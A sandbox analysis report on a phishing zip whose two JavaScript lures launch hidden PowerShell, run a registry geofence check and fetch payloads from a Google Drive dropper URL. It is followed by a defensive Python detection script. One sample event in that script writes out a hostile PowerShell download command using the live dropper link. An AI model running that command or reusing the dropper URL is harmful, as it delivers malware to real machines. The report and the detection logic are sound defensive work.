General

  • Target

    01112024_0726_31102024_Collaboration Request.zip

  • Size

    8KB

  • Sample

    241101-h92gtaycle

  • MD5

    159a95d54a241ba94dc10be0d3f0bcf6

  • SHA1

    2ac9716c89e2e32262f5929e6a908a46934c61d5

  • SHA256

    397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

  • SHA512

    da65ee801bdf975a34ba707e07c6654a1863bc8fedafcca6edce4597aa1c0476dcf6a18d9efd5e5b434f616ee9b69d96e5bc7261482d728b8073539446e28b5a

  • SSDEEP

    192:aNOW255H8Gr60k3ZZxmNCvdqhe+GlJje5i:Wf25iC60k3vi5Qxj6i

Score
10/10

Malware Config

Extracted (the same configuration was recovered twice; shown once)

  • Language

    ps1

  • Deobfuscated URLs

    ps1.dropper
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

    exe.dropper
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      Collaboration Request/Company Info.js

    • Size

      15KB

    • MD5

      03cf8621c289fbd13ebf3f14837da3d1

    • SHA1

      61239e9eeb422eb59306f354546fcd8317a2ce69

    • SHA256

      4d8fd3bbbcf0f1ab58cbef0b189ed1e3abbf6ff523c0b478f80fffc2aa36ba53

    • SHA512

      c1a3483d30f211bd5d17feaa7081c8e75353cf3b556b4bbb86c611b553db8a580c24bcb52c8c0a8c15df20100da4b91aa6e99563466789eee7dedbe1a1513d8a

    • SSDEEP

      384:zkICeaCPI9hUmMLVmdZyukUQqhHdHviwDv:QICjC6hDYmdZKUQqh9PiwDv

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Legitimate hosting services abused for malware hosting/C2 (Google Drive)

    • Target

      Collaboration Request/RFQ.js

    • Size

      15KB

    • MD5

      e1b56b06f44512e79ce26a1db4958fa0

    • SHA1

      5c0a3a02fd37d85330012ac27ee59cd05466f866

    • SHA256

      943e6c8dd31effd085cd83c1f681d8c2f5d7d1967b34dacfed7ac3db51d60c1b

    • SHA512

      b5a3e3c82a812375da64ad2e7ba3820d9058adc2f5f3d45035984b27dec64451cbd45b547385e7de221e82b01967aff2495d33a826eb0738871c739a27b95770

    • SSDEEP

      384:zktd8aCPI9hUmMLVmdZyukUnRHxHCiDze:QtdhC6hDYmdZKUnRRiiDze

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Legitimate hosting services abused for malware hosting/C2 (Google Drive)
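
Detection logic for the behaviour both JavaScript lures exhibit (PowerShell launched with a hidden window, a registry country-code lookup, and a Google Drive download link), as an added example that is not part of the sandbox report. It runs offline over constructed process-creation events in a Sysmon-like shape. The wscript/cscript parent process, the `Control Panel\International\Geo` registry key and the alternative Google Drive URL forms are assumptions not stated in the report; the file id in the first sample event is the one from the extracted config.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample process-creation events (not taken from the report).
# Shape mimics Sysmon Event ID 1 fields: ParentImage, Image, CommandLine.
# Assumption: the .js lures run under Windows Script Host (wscript/cscript),
# which then spawns PowerShell; the report itself only names PowerShell.
SAMPLE_EVENTS = [
    {   # hidden PowerShell, registry geo lookup, Google Drive download
        "parent": "C:\\Windows\\System32\\wscript.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": (
            "powershell.exe -nop -w hidden -c \""
            "$g=(Get-ItemProperty 'HKCU:\\Control Panel\\International\\Geo').Nation; "
            "iwr 'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur'"
            " -OutFile $env:TEMP\\a.ps1\""
        ),
    },
    {   # benign admin script launched from Explorer
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    },
    {   # cscript parent, hidden window, encoded command (payload is UTF-16LE "ABC")
        "parent": "C:\\Windows\\System32\\cscript.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -WindowStyle Hidden -EncodedCommand QQBCAEMA",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts abbreviated switches, so match any "-w..." followed by
# "hidden" (-w hidden, -win hidden, -WindowStyle Hidden), case-insensitively.
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden\b")
# -e, -ec, -enc, -EncodedCommand (but not -ExecutionPolicy)
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc[a-z]*)?\b")
# Assumption: the "checks computer location settings" signature corresponds to a
# read of the per-user Geo key; the report only says "country code in the registry".
GEO_RE = re.compile(r"(?i)Control Panel\\International\\Geo")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com", "docs.google.com"}


def drive_file_id(url: str):
    """Return the Google Drive file id from the common URL shapes, else None.

    Handles ?id=<id> (uc?export=download, open, download) and /file/d/<id>/... so a
    block on one id covers the link variants through which the same file is reachable.
    """
    u = urlparse(url)
    if u.hostname not in DRIVE_HOSTS:
        return None
    ids = parse_qs(u.query).get("id")
    if ids:
        return ids[0]
    m = re.match(r"^/file/d/([A-Za-z0-9_-]+)", u.path)
    return m.group(1) if m else None


def detect(event: dict) -> list:
    """Return the indicator names an event matches; an empty list means nothing matched."""
    hits = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    if HIDDEN_RE.search(cmd):
        hits.append("hidden_window")
    if ENCODED_RE.search(cmd):
        hits.append("encoded_command")
    if GEO_RE.search(cmd):
        hits.append("geo_registry_lookup")
    for url in URL_RE.findall(cmd):
        fid = drive_file_id(url)
        if fid:
            hits.append("gdrive_download:" + fid)
    return hits


def is_suspicious(event: dict) -> bool:
    """Alert when a script host spawns PowerShell and at least one more indicator fires."""
    hits = detect(event)
    return "script_host_spawns_powershell" in hits and len(hits) >= 2


def triage(events: list) -> list:
    """Indices of the events that should be alerted on."""
    return [i for i, e in enumerate(events) if is_suspicious(e)]


if __name__ == "__main__":
    for i, e in enumerate(SAMPLE_EVENTS):
        print(i, "ALERT" if is_suspicious(e) else "ok", detect(e))
```

Requiring the script-host parent together with a second indicator keeps ordinary hidden-window administration scripts out of the alert queue, while `drive_file_id` lets a blocklist key on the file id rather than on one exact URL string.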

The behaviours above are mapped against MITRE ATT&CK Enterprise v15 (Command and Scripting Interpreter: PowerShell, T1059.001).